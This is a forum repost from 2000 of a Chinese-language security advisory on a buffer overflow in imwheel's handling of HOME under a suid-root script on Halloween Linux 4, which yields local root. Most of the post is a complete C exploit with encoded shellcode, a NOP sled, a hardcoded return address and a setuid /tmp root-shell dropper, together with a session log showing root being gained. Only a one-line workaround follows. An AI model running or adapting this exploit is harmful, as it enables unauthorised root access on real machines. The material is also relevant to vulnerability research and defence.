● Halloween Linux imwheel 缓冲区溢出漏洞 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: bstone (无心伤害), 信区: Hacker
标  题: Halloween Linux imwheel 缓冲区溢出漏洞
发信站: BBS 荔园晨风站 (Sat Mar 18 08:01:36 2000), 站内信件

  所有系统 AIX BSD(eg,OpenBSD) Digital Unix HP-UX IRIX Linux FreeBSD SCO UNIX
SunOS Solaris Windows Other 漏洞类型远程进入系统本地越权访问拒绝服务攻击嵌入
恶意代码 Web数据接口其他类型发布日期一周内一个月内所有

  首页 >> 安全漏洞 >>

  Halloween Linux imwheel 缓冲区溢出漏洞

发布日期: 2000-3-18

更新日期: 2000-3-18
受影响的系统:  Halloween Linux Version 4 - imwheel
描述:
--------------------------------------------------------------------------------

    在imwheel程序中没有检查"HOME"环境变量的长度，就将其复制到一个固定大小的
buffer
    中，导致可能发生缓冲区溢出。而在Halloween Linux Version 4中，有一个perl脚本
    'imwheel-solo'被设置了suid root位，这个脚本调用了imwheel程序（以euid=0身份).
    因此，攻击者可以利用这个漏洞来得到本地的root权限。
    另外，存在一个任何人可写的pid文件，用户只要将要杀死的进程id写入这个文件中，
就可
    能欺骗imwheel-solo脚本，让它发送SIGTERM信号给该进程，导致该进程终止。

<* 来源： S. Krahmer, C-Skills
            http://www.cs.uni-potsdam.de/homepages/students/linuxer/

          TESO
        http://teso.scene.at or https://teso.scene.at/
*>

测试程序：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

    [stealth@liane stealth]$ id
    uid=500(stealth) gid=500(stealth) groups=500(stealth)
    [stealth@liane stealth]$ cd imhack/
    [stealth@liane imhack]$ stat `which imwheel-solo`
      File: "/usr/X11R6/bin/imwheel-solo"
      Size: 795          Filetype: Regular File
      Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/
root)
    Device:  3,1   Inode: 214472    Links: 1
    Access: Mon Mar 13 17:32:22 2000(00000.00:04:38)
    Modify: Mon Nov  1 23:41:15 1999(00132.17:55:45)
    Change: Sun Mar 12 17:49:43 2000(00000.23:47:17)
    [stealth@liane imhack]$ cc imexp.c
    [stealth@liane imhack]$ ./a.out
    Creating boom-shell...
    Creating shellcode...
    You can also add an offset to the commandline.
    Get the real deal at http://www.cs.uni-potsdam.de/homepages/students/linuxer
    Respect other users privacy!
    Invoking vulnerable program (imwheel-solo)...
    imwheel is not running as a daemon.
    imwheel is not checking/writing a pid file, BE CAREFUL!
    An imwheel may be running already, two or more imwheel processes
    on the same X display, or using gpm -W, will not operate as expected!
    imwheel started (pid=1385)
    Knocking on heavens door...
    sh-2.03# id
    uid=0(root) gid=500(stealth) groups=500(stealth)
    sh-2.03#

imexp.c

/*** Halloween 4 local root exploit for imwheel-solo. Other distros are
*** maybe affected as well.
*** (C) 2000 by C-skills development. Under the GPL.
***
*** Bugdiscovery + exploit by S. Krahmer & Stealth.
***
*** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
***
*** other advisories and kewl stuff at:
*** http://www.cs.uni-potsdam.de/homepages/students/linuxer
***
***/
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>

/* chown("/tmp/boomsh", 0, 0); chmod("/tmp/boomsh", 04755);
*/
char shell[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x0
1\x46\xe2\xfa"
"\xea\x0d\x2e\x75\x6c\x71\x2e\x63\x6e\x6e\x6c\x72\x69\x01\x80\xed"
"\x66\x2a\x01\x01\x54\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xab\x11"
"\x01\x01\x30\xc8\x8c\xb2\x3b\xee\xfe\xfe\xb9\xb7\x01\x01\x01\x88\xcb\x52\x88"
"\xf2\xcc\x81\xb8\xec\x08\x01\x01\xb9\x0e\x01\x01\x01\x52\x88\xf2\xcc\x81\x30"
"\xc1\x5a\x5f\x88\xed\x5c\xc2\x91\x91\x91\x91\x91\x91\x91\x91";

/* filename-buffer plus ret + ebp
*/
#define buflen (2048+8)

int main(int argc, char **argv)
{
    char *im[] = {
        "/usr/X11R6/bin/imwheel-solo",
        0
    };
    char *a[] = {
        "/tmp/boomsh",
        0
    };
    FILE *f;
    struct stat s;
    char boom[buflen+10];
    int i = 0, j = 0, ret =  0xbfffee68;    /* this address works for me */

    if ((f = fopen("/tmp/boomsh.c", "w+")) == NULL) {
        perror("fopen");
        exit(errno);
    }
    printf("Creating boom-shell...\n");
    fprintf(f, "int main() {char *a[]={\"/bin/sh\",0};\nsetuid(0);\nexecve(*a,
a, 0);\nreturn 0;}\n");
    fclose(f);
    system("cc /tmp/boomsh.c -o /tmp/boomsh");

    printf("Creating shellcode...\n");
        memset(boom, 0, sizeof(boom));
    memset(boom, 0x90, buflen);
    if (argc > 1)
        ret += atoi(argv[1]);
    else
        printf("You can also add an offset to the commandline.\n");
    for (i = buflen-strlen(shell)-4; i < buflen-4; i++)
        boom[i] = shell[j++];
    *(long*)(&boom[i]) = ret;

    printf("Get the real deal at
http://www.cs.uni-potsdam.de/homepages/students/linuxer\n"
           "Respect other users privacy!\n");

    setenv("HOME", boom, 1);
    setenv("DISPLAY", ":0", 1);

    printf("Invoking vulnerable program (imwheel-solo)...\n");
    if (fork() == 0) {
        execl(im[0], im[0], im[1], im[2], 0);
    }
    sleep(4);

    memset(&s, 0, sizeof(s));
    stat("/tmp/boomsh", &s);
    if ((S_ISUID & s.st_mode) != S_ISUID) {
        printf("Boom-shell not SUD-root! Wrong offset or patched version of
imwheel.\n");
        return -1;
    }
    /* Huh? :-)
     */
    printf("Knocking on heavens door...\n");
    execve(a[0], a, 0);
    return 0;
}

--------------------------------------------------------------------------------
建议:
临时解决方法：

chmod a-s `whcih imwheel-solo`

绿色兵团翻译整理，未经许可，不得转载
欢迎访问我们的站点http://www.isbase.com/
绿色兵团给您安全的保障

关于我们   合作伙伴   绿盟月刊   安全论坛   系统漏洞   安全文献   工具介绍   服
务项目   客户专区

--------------------------------------------------------------------------------

绿盟计算机网络安全技术有限公司版权所有   联系:isbase@isbase.net
© 1999,2000 isbase Corporation. All rights Reserved.

--
☆ 来源:．BBS 荔园晨风站 bbs.szu.edu.cn．[FROM: bbs@192.168.28.23]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店